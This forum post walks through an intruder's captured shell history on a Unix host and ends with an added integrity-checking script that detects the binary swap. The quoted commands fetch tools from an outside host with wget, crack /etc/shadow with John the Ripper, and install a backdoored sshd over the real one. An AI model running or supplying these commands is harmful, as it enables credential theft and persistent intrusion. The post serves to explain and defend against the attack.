**** forgot something:

I posted this because I thought it was very interesting and it showed a common way to hack a computer running a Unix OS.

w

The first command they ran was "w", which was probably to see who was online and whether root was sitting at the console or not, and OF COURSE to check the uptime, maybe to take a guess as to when the last reboot was. This helps find an exploit that the machine may not have installed. Though this tech works better on Windows, where EVERY patch needs a reboot.


wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf

They used wget to grab a file from their own website, which was a hacked version of a common application used by admins.


john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow

They remove the downloaded file so the admin doesn't find it.

wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h

Editing the header file.

cd ../..
./configure --without-x
make
make install

Installing the backdoored app.

mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd

Removing the actual applications to make room for their hacked copy.

cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart

A mild **** up

w

Check if anyone is going to notice a reboot.

reboot

Pow.
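The two things in that history that a defender can actually catch are the replaced /usr/sbin/sshd and the original binary squirrelled away under /lib/java. Below is an added example (my own script, not something from the original post or from the people whose history it shows) of a tiny integrity baseline plus a search for stray copies of a baselined binary. It assumes a Linux host with coreutils (sha256sum, mktemp); the fake root, the file contents and the baseline path are constructed fixtures built inside a temp directory so the script runs offline and touches nothing real.

```shell
#!/bin/sh
# Added example, not part of the original post: a small integrity baseline
# for critical binaries plus a search for stray copies, the two checks that
# would expose the sshd swap shown in the history (binary replaced in
# /usr/sbin, original stashed under /lib/java). Requires sha256sum (coreutils).
# Every path and file body below is a constructed fixture, not real data.

# sha256_of FILE: print only the hex digest
sha256_of() {
  sha256sum "$1" | cut -d' ' -f1
}

# make_baseline BASELINE FILE...: record "digest path" for each file
make_baseline() {
  out=$1; shift
  : > "$out"
  for f in "$@"; do
    printf '%s %s\n' "$(sha256_of "$f")" "$f" >> "$out"
  done
}

# check_baseline BASELINE: print CHANGED/MISSING lines; status 1 if any
check_baseline() {
  rc=0
  while read -r expected path; do
    if [ ! -f "$path" ]; then
      printf 'MISSING %s\n' "$path"; rc=1
    elif [ "$(sha256_of "$path")" != "$expected" ]; then
      printf 'CHANGED %s\n' "$path"; rc=1
    fi
  done < "$1"
  return $rc
}

# find_copies ROOT DIGEST: list files under ROOT whose content has DIGEST
# (catches an original binary that was moved to an odd directory)
find_copies() {
  find "$1" -type f 2>/dev/null | while read -r f; do
    if [ "$(sha256_of "$f")" = "$2" ]; then
      printf '%s\n' "$f"
    fi
  done
  return 0
}

# setup_fixture DIR: build a fake root, baseline it, then simulate the swap
# from the history: original copied to lib/java, replacement dropped in place
setup_fixture() {
  root=$1
  mkdir -p "$root/usr/sbin" "$root/lib/java" "$root/etc"
  printf 'original sshd binary (constructed)\n' > "$root/usr/sbin/sshd"
  make_baseline "$root/etc/baseline.txt" "$root/usr/sbin/sshd"
  cp "$root/usr/sbin/sshd" "$root/lib/java/a"
  printf 'trojaned sshd binary (constructed)\n' > "$root/usr/sbin/sshd"
}

# demo: run the fixture through both checks; returns 1 if the swap is missed
demo() {
  d=$(mktemp -d)
  setup_fixture "$d"
  if check_baseline "$d/etc/baseline.txt"; then
    echo "baseline unexpectedly clean"; rm -rf "$d"; return 1
  fi
  orig=$(cut -d' ' -f1 "$d/etc/baseline.txt")
  echo "copies of the original binary:"
  find_copies "$d" "$orig"
  rm -rf "$d"
}

demo
```

In real use the baseline file would be written once from a known-good install and kept somewhere the host cannot rewrite (removable media or a separate host), since an attacker with root can just re-baseline after the swap; the copy search is worth running over the whole filesystem, not only /lib, because the stash directory is whatever the intruder chose.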